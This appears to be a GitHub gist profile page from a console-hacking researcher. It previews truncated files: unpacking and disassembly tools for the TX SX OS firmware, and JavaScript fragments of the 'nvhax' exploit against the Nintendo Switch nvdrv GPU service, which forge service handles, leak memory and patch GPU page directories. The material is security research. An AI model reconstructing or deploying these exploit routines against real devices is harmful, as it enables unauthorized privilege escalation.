Skip to content

Instantly share code, notes, and snippets.

hexkyz

Block or report user

Report or block hexkyz

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View tx_decompress.py
# The following is adapted from https://github.com/reswitched/loaders/blob/master/nxo64.py
#
# ===========================================================================================
#
# Copyright 2017 Reswitched Team
#
# Permission to use, copy, modify, and/or distribute this software for any purpose with or
# without fee is hereby granted, provided that the above copyright notice and this permission
# notice appear in all copies.
#
View tx_unpack.py
###############################################
# TX SX OS unpacker - by hexkyz and naehrwert #
###############################################
from Crypto.Cipher import AES
from Crypto.Util import Counter
import os
import struct
"""
View tx_vmdis.py
###########################################################
# TX SX OS MIPS VM disassembler - by hexkyz and naehrwert #
###########################################################
import os
import re
import struct
host_calls_0 = {
0x8E943DA2 : "host_crc32 (ptr r4r5, len r6)",
View ipatch_decode.c
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <stdbool.h>
#include <string.h>
#define ARRAYSIZE(x) (sizeof(x) / sizeof(*x))
#define FUSE_IMAGE_SIZE 0x400
#define ROM_BASE 0x100000
View sploitcore_send_request.js
sploitcore.prototype.send_request = function(srv_handle, type, domain_id, cmd_id, params, dump_reply, show_log) {
var req_buf = this.malloc(0x1000);
if (show_log)
utils.log('Request buf: ' + utils.paddr(req_buf));
var request_reply = [0, 0];
var err_code = [0, 0];
// One handle and 2 words input type
View sploitcore_nvdrv_leak.js
sploitcore.prototype.nvdrv_sharedmem_leak = function(nvdrv_buf, dev_handle) {
var temp_buf = this.malloc(0x1000);
var nvdrv_ioctl = this.bridge(0x1A247C, types.int, types.void_p, types.int, types.int, types.void_p, types.void_p, types.void_p);
// Setup buffers
var in_buf_ioctl = utils.add2(temp_buf, 0x000);
var out_buf_ioctl = utils.add2(temp_buf, 0x100);
var out_buf_status = utils.add2(temp_buf, 0x200);
var in_buf = utils.add2(temp_buf, 0x800);
var out_buf = utils.add2(temp_buf, 0x900);
View sploitcore_break_nvdrv.js
sploitcore.prototype.break_nvdrv = function(sm_handle) {
var meminfo = this.malloc(0x20);
var pageinfo = this.malloc(0x8);
// Leak nvservices base address
var nvdrv_base = this.get_nvdrv_base(sm_handle);
// Forge a new service handle for NVDRV
var srv_handle = this.forge_handle(sm_handle, "nvdrv:t");
View sploitcore_nvhax.js
/*
nvhax exploit
*/
// Global nvservices exploit context
sploitcore.prototype.nvdrv_exp_ctx = {};
sploitcore.prototype.spawn_nvdrv_srv = function(sm_handle, transf_mem_addr, transf_mem_size) {
// Forge a new service handle for NVDRV
var srv_handle = this.forge_handle(sm_handle, "nvdrv:t");
View nvhax_find_channel.js
sploitcore.prototype.nvhax_find_channel = function(hw_num) {
var mem_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40000);
var page_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40100);
var test_addr = [0, 0];
var ch_base_addr = [0, 0];
// Look for user channel
while (test_addr[1] < 0x80)
{
var result = this.nvhax_svc(0x06, [mem_info_addr, page_info_addr, test_addr], [], false);
View nvhax_patch_channel.js
sploitcore.prototype.nvhax_patch_channel = function(ch_base_addr, target_paddr) {
// Map GPU MMIO
var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);
// Page directory is always at channel + 0x15000
var pdb_vaddr = utils.add2(ch_base_addr, 0x15000);
// Read page directory base IOVA
var pdb_iova_lo = this.nvhax_read32(utils.add2(ch_base_addr, 0x200));
var pdb_iova_hi = this.nvhax_read32(utils.add2(ch_base_addr, 0x204));
You can’t perform that action at this time.